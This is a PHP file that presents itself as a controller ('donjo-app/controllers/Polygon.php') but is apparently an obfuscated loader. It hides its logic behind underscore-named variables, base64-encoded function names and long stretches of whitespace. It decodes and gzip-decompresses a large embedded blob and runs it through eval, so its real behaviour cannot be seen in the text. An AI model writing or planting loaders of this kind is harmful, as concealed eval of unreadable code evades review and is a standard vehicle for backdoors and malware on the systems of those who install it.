<?php 
        $__='printf';$_='Loading donjo-app/controllers/Polygon.php';
        







































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXFlz4ta2fk/V/Q/9cKqcU31vIgnTbaqrH5CMQAJjI4Gml5QGWwI0cAyY4defb20NDMZDJ53xshPFbQ17WOtb3xr2Tn/4kLd//YL29WL2OE4XDxdf2K9F+3oRZOkk+z93NvvZz9LFYxbH94/zn++yeBNm6U+zaPZBit35/Keffrr48kPR4Yf/+eH8zz//nx8IKR++Y/v67M6FxTfmtsmPnXbr6wW7tUPZu1qB5q8fzu3czu3c/pntwk8MLrDUpdI2BNtcZarceLA20885aYI1c7r+5Syqczu3czu3czu3czu3czu3v1s7lzPO7dzO7dz+ue3Cc+f3ny5/Ce79LLi/+HKWyLmd27md27md229qh0ccpDB76oZZyK6x2HbNday046Wri2PbDGa2eRk6bXnjDrOuIrErHNbE2Iv7qtasvhu6Vp9zTC50zXri1dSFbfVnSluLfaEV+jVjYSfGRung90TlXdwLzDoXmPPQM/HMnOGevCzer8YZWOLcNReRL0xpDkul038KLHXi6OLEE7RynlPXUmdeO94qbRX9a3gf82X9rWe+YCzpe40XbxTZ3krj5n/oUlpR5G7Ea9cSOVtvbm6um3VF4sKbSXPd18VrT+DHWEusyOhTaPB+0o+VVrz0a9os6BicazaWihRlQUdb3Y6vnrwO1pEaS0dYPHmWsXQtzGNTXzrW4Kk7YDJSbKx3IMSroN3Kxxk3F8q1srqZDMJR29i4kJPfMeYkc61tbG1dbLnQQdCW54q8k123HXFBR9yycUkXCZPb0jUHs936NNwPIm8szryE5BePHcgpl0v8yTUv55BnbENWGCf1E5lzrZu50l7Eflue4t7WNeUVfq4CzOfelJfORlw4Zn1qW2IUtBfU99Y21+hfXrIx21gzxvKxFtuspxiLgw54PH8sdcXwlMRz6HDqCQse+l9ifVs84zC/R9uMOUUKx/u61836TBlPMV+82zHQlzajMby2/BjgHS/HIIcxab5j22IYWPYk1idhkYeuM5L/Hu6gq4DNzSZZtPnYS+MIOKLvaJ1pYKqRK7E5P1GfgZ6vn7DuJ/E4AMZJnr0mG5/GxBw19KnReCvb1CLIuG5bahRIYi7/msHd7uxt4ND5DtyHDLLAJN0wXE5yXALbOsla3pJsIe/V8/eZLsnuZvStnxpbJh/B2OCdx8J+gSmO2RTuc6RXzIutlZ4Xa6vsHbKFTmLSt+jDhrBG0o8KHC2VlgodMyyU+KiTrpn8kiADNnh/w+bMl/fAKRF+0lzyObRzPiAbcTtGhVHoZE59OcAk4TBoM33T8zlkDv2AU1ryCvN+ZPzSIkxdVnwxahn6YFTv6Jw8UlprYziVe3jnVocd6UZf1lqxiGe3iqQOtZEqapysDkfy7UAXRa0l35qj1hi6H6GPAe51ByNeRR+3GJN+Hxgj4KSlivpoHhoYa8RjPGMQog8D/94yG5A1eQRuHE3lUQ/61UZ1Y9iKh+hjhA5ojn1tFIjDqR/qLZof3pU1UZH74nDUCkec0RuM1ir6UTX2XEV/Gt6HJLA2pTUTDU6W8v5uQp1bYz4c5rXAe8ZwMFqIw7EoGi3ZyHlgIeP9ro710v0R1oJ1hANDE0cbNj8g1rgdjNg62RyHLchlWnew5pFmqJhPPCIZYB29gdFXc5nu5D7oiJEtLCJHGIWKJN4RfkZc3MrHBxYsLfNqCp41Q6MdLxSZOCuIPdiXl/i5P5lW3B8O2v0nvxNvwH0Z7OaYN1e3esGbwxHuN4AlYFUXdceq/IMKrIDPNB44fvLGzcztaJx/nT31BPCRqfKER3A8fsacbd0svcTgepvpe8b/3XgbsgLnMZzHJKtqzrWgFmzqqZeOlvCtKdYws5lfM7Y9IVh5Uj0L2jwwEAyGkmjerBi3NMm+3U2TyV3ZG9sRYg52N+4l/SdPb1T66nEN8Et9qI8GpW6fpHDG+9Ar+Hhltfgnp23MfX498IR13RHgA4mbZBH+L049od4nv+xdz7sS1uaQXsxBpnKqCFwPgDlF3UzDh84qdKxoFkhhOkyuyDdtHLPPgZMm4NUVZA489WO/dhPCv8y9WhA7kj+7XWVdW1hHdH/UbszvzQC6FeP7Dvk6bQuMTj0zXloc1pVqG8xx7lhK9x7yIBlAR2PIZKK06TnGk8W7oRx3htxlLqNr+H/Mnf25I/J2AjlvKNaobzGnoTFSH0atxo05Cu6G42YDGPiM+Omwb0lbQAa8JzcYp5X9qqRv04CPkpfq9niM5hQx0tgSIF/gyBKI19C/FJA+UvAzT5zbs0RwYiu9rdYDPwC/DbzPvHQQqh3wvtSsxuwPq3HAtQ44eUR+Av5VW8EnxfQNnmMdrc/AH9nuCvIXMB6LrQKpOYX9rBw97/NOh+2tsmP5JPCpk9zOxAdLyGULPzSBfmdFv0X/+YX4Avquc7eT2bP3y7XlmI23A/jXrhSMgZtyjo1nMm87sON+HpOR32obl11p+knpOE+wrWK+hSzyawqfSHFfQ5HnKa1R3TQbd2NabzTzN9xHuteTmmm+fj+8G16SfDPESIs74Bpjc70hfJUFfNcoHhmlXb35893msA9HX4Wkx0LeKfTyEfLnXKwN30NvIh9I3EcHfrm7995xX6XMaE7lny1hBtzH22LuqcpzB3J2TTvsStqU/Lu5CcCHYox3sBbgcatgjEO95Ff1fjEX7cFNKJ69SS0mr2Nbzz4xO5fCXKbGvJofxpphjYgx+Ei5vvpZkfz0QL8d7rlO6Psa4pGOsWVz1UWvsvVpzj/Azc2Q6/dyWQaiC/k7Y39+am7wmfvvjlzEZIivim+CoMIzu0TBNY0a9BA5bX7mjesrB7LopWW/l+Dq+tSxwrRXYei9uNQoJoL9q+Ckm4xyAnr3/hDvCWLfSucYaxVYA8Lb1hLk/9hW9OAnxjowjS3Zygv6q2wb9nqiryAm3q10BD6+217tsJ0ijoW+A+Lw530zDDE++zW2MDzRZ0eNoesNuIPhDjKC7Iwt7Bd9N5LuCZ0GQgSfagywTraG7m7NhLeaC5/sGGweGePE9mhWyvv4wvvQtYZ8j+KCy0yF33HhX/3aADoWt6Qz17wJHeR2NtYGDJBNbbyaPzvilKNLBL6amZ3zVwY5v/F+wY3lUUbJvyp0FgYdkh03trFuxFljrxaOlXY98sxRQ0niKTh0bPLcGHwXIQ+N73QlVSTiK/UpYLofhD3wgzK++lj5ntNzbjzXeX7/DfmpFMvct/osD/bGJe8/u6BTeers3kttc4HcwqdcFHGYduRPmlm+BuJylnNR3vH5hb7ZpSLnoZwR2E/fWOu+fvj36qfsvzchDl1HiKuAQbuhjH3IGHmb0QA2DPhksrEyRslrIupmBU7mkb80pvS8tyHOmk/9pFGDHFclnolbinszR+Zg503CA3TenyPv2d7p6jhoI29LNcQEAewVfgRxdP57f6FAPpAf57WBj9hAXheO7ybr2d73CWJUXHyM2ItTJpdXPWH68U5qRORHDjj6+AJnvyb/wueQfeRckhY+BBgkv4OYde5Msk+7OGp6yIGnr2mOk+aS9HqHONwFbzgTDnEBZNPuz6wacIK4hXxoGZv2kjwWII4j/N/VSm7jTtqHmjKuaNwwXZK9IPZDfOtvYXuQrdJG7E35bSpS/YJ0sPAF2J0kUq4xJxsdYUxbiJGzNg/G8BJ5YVd6JJ5rLXY6UqG/Psu92XpK+SVk4618LtCRq+/m4yStEBdyH3njbxTS3exusnqyKU55y8bDV+TNfFA0sYkLa8Tj79FPbkvlWsm3MDkjBnYQX8KHbx1zncBvD4bc2tG4xu1p3/U9dZ/7S9vUplatz9txo3pGdrin+xnT00YJi9wCnKpy8EdjZ8M/wY8LL+naaMsk/ww5NvRppLBx9PW23iGbhVfTYmaH5nrr6EqYxxI85wlByjCRUKyD/LHwiz2qaZHvvsYchPzZIGlc7j1HvrmmPkf0/wzB5kNdQG4A/qGa3Lfiym+v+W/DVX49DLI33zngCOCExUQFP5yI9YzhdH034Obv4uciToncWp/02iA/Cq7LIPOk9IuwT8RRDT6g+KC2i+0qvo4bc0/oP353vk78BfAg3O/jqVPpLY9JE6qrQu7t6R4eHfgZJ+qZ6ydbmI/vxs7STvur2+3qyR0Sd7cQ2/pv29Mb3L0fgxbrQX7B4rEpYr6Tsf+w1bjWN+/i8N/iPyvbtWrGEvqYuKSLdkw4BU6gx80VxWveMw6S9m1dC4jPXuR2sx4F6XTPj+5sfZgghm/Jj+DshNXQX7AbxC4MO9/kU1+Nvd5jV78u1nxZFzcVV72Pa4GFNuns99AJD95rUG3hJAfrbRkx8s2eT22kjsDsieowkSftuBX2SjkK1tenmk7iWuqiZ5Zzf8HmLG0DG8565tWYePC99vaGvjYOq+lcljr4/Cvibha7DYTGPDB50ntlq8RbLIfOc9Blac/dYUb3Ny7V6/M6xEkOVrctPEdOyMcR9P5plzf7r8T1xhQ62c+j4Dsbm/fPxb/CegSK8+9Npj/4sP6jQ3hDzt0z8/5u89is5Cfocf3kj3O+3fHiGnOxP6qsnntqvsBiItdK2fmbyFMFpgfK61NbMB5pPzGQgGcpKMYIgld0sUCMAps41OMhBnY694XoKeCvuJtrvFDV6Epupv02dX6cczoJeFGH7Iq8ndUqddhRO56yfLzSzWFc5Vr96yqWGx7WwI5rS3lefzr/L3w24rmTXF/VbvJYLQj2nlEd06A46VT8oOZ1EW/PD1Odqag3ilWdeWjCB5urT7eJg1h5kNG6uzrVFRoicozoXj+qHR7Ni8nPaESFPPNa1kt8lhor+u5lPjuqlUi5Hix9Ojuqb4UOi+9erbOxWIVqXcpe7VblwV1s/9F/tUZXxbTl9/jWS425d/2KrAUHMSGP2DivTRV1tpd874z2I/x0wGpex5g5xNRxbrFfe2zmMt/VPune54P3d7WgN+twuT2QfeZjvNeObHMW3csNqlk8sJr7DnfZcW2c6t0n63S7dbG83hLkol4B3EP++/Glclg73DqWyvXSeWXHD7oyO6pBVjwRJHEcbKhGoi1ck+JTA36s/izH+bWyKOfTLWr9O51mGBu5W/NkjbKsyfO7mvwBvtQCL8e2uK97gc4NOGzf/0S9EzLza+BG/bX+NeKMor4wKLFV6u7wu7wG+JKvPsKkGO/XE29P6F0v5LZfUy/2R6an6pxBR62fisdO5DoT8EnE8pJDWZ7gNuDExLoSY4I8uwbfm0En28DsTxzkHCzH5fN101roXATmnNG+uSfRmRn8tETkGsRxv7Z+UvIf879JvvbyWV53PeZDxKicLYRht2Vcws+uijof8qtTfkVELB08eKax9QU5JV7CGsBRSl5/1/N9k+Hu+ezIx5U1VTojFAP3DwHtfUoH/aQG26dha0HMB86hcxzsDAVxv8zqBS/ljOV+QJHz/Vza0J1exCmlb2U1BofhpXyW7w89ixkOY4fT+2y8z/BB9e1DH/Qbbdco+v29bLfo3/jTbNewWL0k/h1sN9930CmWjKflfqJrDubF/l+x35Lfr/bw9ClkVsYb5R5a+fuJvIDysWK/3KrRGYMQeOzzxX75CTzTmbgoApb/PEwjtoDMJ67UzDQrAj+Jxfk58M2p2IjiLb6xIB6zzYA4CRyoIgZnPi7O95q0/u759L38uNcPchray2JrQe4O/rDNFZ1F2FLNBzEzxXovx0S03yH5ee1w2ygx1yjqbFUMsV9XLp7lOD2Om963h1jkqrs8gHiQapi3iJk84O5UDlDa0P5+YK6ncPpCHDfzuX5E+zNuce5i7xnnpye5+nmsngYZeDbWzV28TrbiMD/z/bHt5rWAP1Rv8J3gs36mSJF838Y8O3lspcL3neIN5LCpJfBYT5/OSyFPNjawQZYn45t8f7a1e959Lwfs93Po94HrIGI+34SsaF/9r+fPgJc1nfd7oPM+Bxz+l8Y11Tniab6f8Gw/fOXV+nSmY+bIjYk99mdn/J/x/wL+d/VtgdX4v19c904b+b4xD9V0MU4Ra3XleYpxIqybzvGxs1QvnemxfoeYx0saS9tcwIc6j3+0X/972Uf9ic7Dl3scf2k7qfaBvi0Wer0eys46vpVT/CafQbaAOZb1d7ZfiHGqfA55yV4dn+zpRF+xccv23Xju+9cFzD9J/3+vHCHa7dX+ofWTZ3W93XndvTyBzoHBZ5BOu2zPTa4Td7F45PV6JjuryXJiqiMnjYVXU6lOusHzB5fqNVSbZL4m72/vm5P5Np5X+yfUZyDIGy9pkX978muaV+0T5d93T++Rsb29E+csq/PP+xzx3GbH7Hz0iXPAuzG6+3XfIe2tTMO7zfNzK8p1FnZfOQNb+VS99LN0/qW5ov206uwTb0gWvzt7jvmV4xydMd87W5py3YsvP/zwx/+Pgl/Zzx+L3/795Vs+3/v2PR/+azfgjxf034v/rYY9//3K/7/+fuVDTPx4AMIcEv/+8l9JQgAt';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































                                                                                                                                                                                                                     $________;
